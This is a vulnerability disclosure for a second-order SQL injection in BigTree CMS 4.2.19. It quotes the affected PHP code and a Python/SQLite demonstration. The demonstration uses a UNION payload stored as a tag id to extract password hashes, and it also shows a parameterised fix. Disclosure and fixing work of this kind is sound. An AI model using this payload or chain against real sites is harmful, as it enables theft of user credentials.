Good day.
I found a SQL injection vulnerability in BigTree CMS through 4.2.19. This vulnerability allows remote authenticated attackers to obtain information in the context of the user that the application uses to retrieve data from the database.
--
file: admin/ajax/dashboard/approve-change.php (excerpt)
$change = $admin->getPendingChange($_POST["id"]);
// See if we have permission.
$item_id = $change["item_id"] ? $change["item_id"] : "p".$change["id"];
if ($change["module"]) {
    // It's a module. Check permissions on this.
    // This call reaches getPendingItem() below with the stored pending-change row.
    $data = BigTreeAutoModule::getPendingItem($change["table"],$item_id);
    $permission_level = $admin->getAccessLevel($admin->getModule($change["module"]),$data["item"],$change["table"]);
    exit(); // assumed to be a stop added by the reporter, not part of the original handler
}
file: core/inc/auto-modules.php
static function getPendingItem($table,$id) {
    $status = "published";
    $many_to_many = array();
    $owner = false;
    // The entry is pending if there's a "p" prefix on the id
    if (substr($id,0,1) == "p") {
        // The id itself is escaped here ...
        $change = sqlfetch(sqlquery("SELECT * FROM bigtree_pending_changes WHERE id = '".sqlescape(substr($id,1))."'"));
        if (!$change) {
            return false;
        }
        $item = json_decode($change["changes"],true);
        $many_to_many = json_decode($change["mtm_changes"],true);
        // ... but the tag ids are decoded from the stored tags_changes JSON
        $temp_tags = json_decode($change["tags_changes"],true);
        $tags = array();
        if (!empty($temp_tags)) {
            foreach ($temp_tags as $tid) {
                // INJECTION POINT: $tid comes straight from the database row and is interpolated without sqlescape()
                $tags[] = sqlfetch(sqlquery("SELECT * FROM bigtree_tags WHERE id = '$tid'"));
            }
        }
        $status = "pending";
        $owner = $change["user"];
    // Otherwise it's a live entry
    } else {
        $id = sqlescape($id);
        $item = sqlfetch(sqlquery("SELECT * FROM `$table` WHERE id = '$id'"));
        if (!$item) {
            return false;
        }
        // Apply changes that are pending
        $change = sqlfetch(sqlquery("SELECT * FROM bigtree_pending_changes WHERE `table` = '$table' AND `item_id` = '$id'"));
        if ($change) {
            $status = "updated";
            $changes = json_decode($change["changes"],true);
            foreach ($changes as $key => $val) {
                $item[$key] = $val;
            }
            $many_to_many = json_decode($change["mtm_changes"],true);
            $temp_tags = json_decode($change["tags_changes"],true);
            $tags = array();
            // Debug output, assumed to have been added by the reporter to show the stored row; not BigTree code
            var_dump($change);
            exit();
            if (is_array($temp_tags)) {
                foreach ($temp_tags as $tid) {
                    // Same unescaped interpolation of the stored tag id on the "updated" path
                    $tags[] = sqlfetch(sqlquery("SELECT * FROM bigtree_tags WHERE id = '$tid'"));
                }
            }
        // If there's no pending changes, just pull the tags
        } else {
            $tags = self::getTagsForEntry($table,$id);
        }
    }
    // Process the internal page links, turn json_encoded arrays into arrays.
    foreach ($item as $key => $val) {
        if (is_array($val)) {
            $item[$key] = BigTree::untranslateArray($val);
        } elseif (is_array(json_decode($val,true))) {
            $item[$key] = BigTree::untranslateArray(json_decode($val,true));
        } else {
            $item[$key] = BigTreeCMS::replaceInternalPageLinks($val);
        }
    }
    return array("item" => $item, "mtm" => $many_to_many, "tags" => $tags, "status" => $status, "owner" => $owner);
}
The values decoded from tags_changes (the $temp_tags array) are not sanitized: they are read back out of the bigtree_pending_changes table and each $tid is interpolated directly into the SELECT on bigtree_tags without sqlescape(). So an authenticated user can store an attack string in that column by saving a pending change, then trigger getPendingItem() through approve-change.php to complete the attack chain (a second-order SQL injection).
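The two-step chain described above, as an added example that is not BigTree's code: an in-memory SQLite model (constructed, MySQL in the real product) of the stored tags_changes JSON, the vulnerable unescaped interpolation from getPendingItem(), and a hardened variant that binds integer tag ids as parameters. The bigtree_users table, its row and the PAYLOAD string are assumptions used to show disclosure; only the columns the vulnerable path touches are modelled.

```python
import json
import sqlite3

# Constructed schema: just the columns the vulnerable code path reads.
# bigtree_users and its contents are an assumed disclosure target.
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE bigtree_tags (id INTEGER PRIMARY KEY, tag TEXT);
        CREATE TABLE bigtree_pending_changes (id INTEGER PRIMARY KEY, tags_changes TEXT);
        CREATE TABLE bigtree_users (id INTEGER PRIMARY KEY, email TEXT, password TEXT);
        INSERT INTO bigtree_tags VALUES (1, 'news'), (2, 'events');
        INSERT INTO bigtree_users VALUES (1, 'admin@example.com', '$2y$10$constructedhash');
        """
    )
    return conn


def store_pending_change(conn, tag_ids):
    """First half of the chain: an authenticated editor saves a pending change.
    The tag list is JSON-encoded into tags_changes, as BigTree stores it."""
    cur = conn.execute(
        "INSERT INTO bigtree_pending_changes (tags_changes) VALUES (?)",
        (json.dumps(tag_ids),),
    )
    return cur.lastrowid


def get_pending_tags_vulnerable(conn, change_id):
    """Second half, mirroring getPendingItem(): each decoded $tid is put into
    the query with no escaping, so whatever was stored in the JSON runs as SQL."""
    (tags_changes,) = conn.execute(
        "SELECT tags_changes FROM bigtree_pending_changes WHERE id = ?", (change_id,)
    ).fetchone()
    tags = []
    for tid in json.loads(tags_changes):
        # Same shape as the PHP: SELECT * FROM bigtree_tags WHERE id = '$tid'
        row = conn.execute(f"SELECT * FROM bigtree_tags WHERE id = '{tid}'").fetchone()
        tags.append(row)
    return tags


def get_pending_tags_hardened(conn, change_id):
    """Hardened form: treat the stored JSON as untrusted input. Tag ids must be
    integers and are bound as parameters; anything else is dropped, not executed."""
    (tags_changes,) = conn.execute(
        "SELECT tags_changes FROM bigtree_pending_changes WHERE id = ?", (change_id,)
    ).fetchone()
    tags = []
    for tid in json.loads(tags_changes):
        if isinstance(tid, bool) or not str(tid).isdigit():
            continue  # reject non-numeric ids rather than coerce or escape them
        row = conn.execute("SELECT * FROM bigtree_tags WHERE id = ?", (int(tid),)).fetchone()
        if row:
            tags.append(row)
    return tags


# Assumed attacker value stored as one "tag id": closes the quote, unions in a
# second table with the same column count, and comments out the trailing quote.
PAYLOAD = "0' UNION SELECT id, password FROM bigtree_users -- "


def run_chain():
    """Runs the whole chain and returns what each variant hands back."""
    conn = setup_db()
    benign = store_pending_change(conn, [1])
    malicious = store_pending_change(conn, [PAYLOAD])
    return {
        "benign_vulnerable": get_pending_tags_vulnerable(conn, benign),
        "malicious_vulnerable": get_pending_tags_vulnerable(conn, malicious),
        "malicious_hardened": get_pending_tags_hardened(conn, malicious),
    }


if __name__ == "__main__":
    for name, rows in run_chain().items():
        print(name, rows)
```

The vulnerable path returns the password hash row in place of a tag row; the hardened path returns nothing for the malicious change because the stored value is not an integer id. Wrapping $tid in sqlescape() would also neutralise the closing quote, but validating the type is the stronger fix since the column is an integer key.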
#SQL injection in BigTree-CMS 4.2.19
--
PoC:
First, add a tree (so that a pending change with attacker-controlled tags is stored).
Then request the URL (admin/ajax/dashboard/approve-change.php with that change's id), which leads to the SQL injection.
If there are any questions, please send the details to my email at xc0161@gmail.com